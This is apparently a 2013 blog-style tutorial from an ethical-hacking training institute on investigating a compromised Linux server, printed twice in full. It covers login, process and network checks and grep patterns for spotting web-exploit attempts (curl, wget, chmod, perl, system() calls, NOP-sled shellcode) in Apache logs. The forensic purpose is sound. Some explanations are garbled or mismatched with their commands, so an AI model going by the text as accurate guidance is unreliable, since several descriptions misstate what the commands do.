| Filename | Is your Linux Server Hacked, Investigation in Arizona Style.. |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 4/26/2013 |
| Label | Penetration |
| Action |
Ethical Hacking Institute in Pune
./Arizona Team
Hi friends !!
Everyday thousands of websites and servers get pwn3d by some H4x0r, So are you a victim ??
Well today I am gonna explain how to investigate your pwn3d Linux server Step by step !!
If you are a Hacker, then pray to God that you never face Investigators like us.
First of all find out whether you are really pwn3d or not ..
find all text files those were modified last 60 days ago
Command :
This below command will let you find out who was connected or currently on the Server
"$ find /home/username -iname "*.txt" -mtime -60 -print"
by execution above command it ll find you all those text files which were modified since last 60 days you can change time duration and also file extension.now if you want find all those php files those were modified by anyone either by you or by h4x0r change "*.txt" to "*.php"
Furthermore, Follow the step one by one to find out whether your server is pwn3d or not..
Who is currently active and connected on the Server:
$ w
$ netstat -nalp | grep ":22"
OR
$ w && netstat -nalp | grep ":22"
The above command will let you find who are currently connect to your server via SSH port
This below command will let you find out who was connected or currently on the Server
$ last
This below first command will let you find out who logged in your server using SSH port (22) using root password while the second one will tell you who connected your server using FTP (21)
$ cat /var/log/secure* | grep ssh | grep Accept
$ cat /var/log/secure* | grep ftp | grep Accept
Now check out what is Current Network Activity of your server
$ netstat -nalp
$ nmap localhost
OR
$ netstat -nalp && nmap localhost
What Active processes are Running:
$ ps -elf
$ ls /proc/*/exe -la
What Files are in the Common Attack Points:
$ ls /tmp -la
$ ls /var/tmp -la
$ ls /dev/shm -la
These are all the common unsecured places where the h4x0rz intrudes into your linux server.
Don't delete any thing or make changes just yet, just catalog every thing. Do not access a file with cat or strings, catalog the files and save that for later. Once you start deleting things you can no longer further investigate as to how deep they have penetrated. Don't be fooled into seeing a common Apache compromise and think it ended there. Many times that was just the broken window they used to get in the first time, mean while they are tunneling deeper trying to get into root access.
Few Common things to check
Find out Linux version
$ cat /etc/redhat-release
For non Red-Hat Linux
$ cat /etc/issue
Now Compare this to the kernel version
To find kernel version
$ uname -a
and
$ cat /proc/version
Who is the author of the file:
$ ls -la --author
When was the last time the file has been accessed and by whom:
$ ls -l --time=access
Before you run off and use the cat command it is good to first check the file type with the file command. Many times even I myself have been fooled seeing a file marked as something .html and finding it was really a binary file.
What kind of file is it(ASCII or Binary):
$ file filename
OR
$ file /path/to/directory/*
You have been trying to be sneaky and not have any obvious virus scan running in the process list so as to not be detected, but that is tedious work and slow.
Update the Locate Database:
$ updatedb &
If this is a web server then the next thing to hunt for is signs of Apache exploits and SQL injection scripts. The below command does a nice job of hunting through the log files rather than the long tedious work of searching manually.
Search for Apache Exploit
$ for i in `locate access_log`; do echo $i; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i; done
OR
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
For cPanel
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
Ensim
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
Plesk
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*
Search for Shell Code:
$ cat /path/to/access/logs/* | grep "/x90/"
Dont ever dare to get involved in Unethical Hacking..
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE
./Arizona Team
Hi friends !!
Everyday thousands of websites and servers get pwn3d by some H4x0r, So are you a victim ??
Well today I am gonna explain how to investigate your pwn3d Linux server Step by step !!
If you are a Hacker, then pray to God that you never face Investigators like us.
First of all find out whether you are really pwn3d or not ..
find all text files those were modified last 60 days ago
Command :
This below command will let you find out who was connected or currently on the Server
"$ find /home/username -iname "*.txt" -mtime -60 -print"
by execution above command it ll find you all those text files which were modified since last 60 days you can change time duration and also file extension.now if you want find all those php files those were modified by anyone either by you or by h4x0r change "*.txt" to "*.php"
Furthermore, Follow the step one by one to find out whether your server is pwn3d or not..
Who is currently active and connected on the Server:
$ w
$ netstat -nalp | grep ":22"
OR
$ w && netstat -nalp | grep ":22"
The above command will let you find who are currently connect to your server via SSH port
This below command will let you find out who was connected or currently on the Server
$ last
This below first command will let you find out who logged in your server using SSH port (22) using root password while the second one will tell you who connected your server using FTP (21)
$ cat /var/log/secure* | grep ssh | grep Accept
$ cat /var/log/secure* | grep ftp | grep Accept
Now check out what is Current Network Activity of your server
$ netstat -nalp
$ nmap localhost
OR
$ netstat -nalp && nmap localhost
What Active processes are Running:
$ ps -elf
$ ls /proc/*/exe -la
What Files are in the Common Attack Points:
$ ls /tmp -la
$ ls /var/tmp -la
$ ls /dev/shm -la
These are all the common unsecured places where the h4x0rz intrudes into your linux server.
Don't delete any thing or make changes just yet, just catalog every thing. Do not access a file with cat or strings, catalog the files and save that for later. Once you start deleting things you can no longer further investigate as to how deep they have penetrated. Don't be fooled into seeing a common Apache compromise and think it ended there. Many times that was just the broken window they used to get in the first time, mean while they are tunneling deeper trying to get into root access.
Few Common things to check
Find out Linux version
$ cat /etc/redhat-release
For non Red-Hat Linux
$ cat /etc/issue
Now Compare this to the kernel version
To find kernel version
$ uname -a
and
$ cat /proc/version
Who is the author of the file:
$ ls -la --author
When was the last time the file has been accessed and by whom:
$ ls -l --time=access
Before you run off and use the cat command it is good to first check the file type with the file command. Many times even I myself have been fooled seeing a file marked as something .html and finding it was really a binary file.
What kind of file is it(ASCII or Binary):
$ file filename
OR
$ file /path/to/directory/*
You have been trying to be sneaky and not have any obvious virus scan running in the process list so as to not be detected, but that is tedious work and slow.
Update the Locate Database:
$ updatedb &
If this is a web server then the next thing to hunt for is signs of Apache exploits and SQL injection scripts. The below command does a nice job of hunting through the log files rather than the long tedious work of searching manually.
Search for Apache Exploit
$ for i in `locate access_log`; do echo $i; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i; done
OR
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
For cPanel
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
Ensim
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
Plesk
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*
Search for Shell Code:
$ cat /path/to/access/logs/* | grep "/x90/"
Dont ever dare to get involved in Unethical Hacking..
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE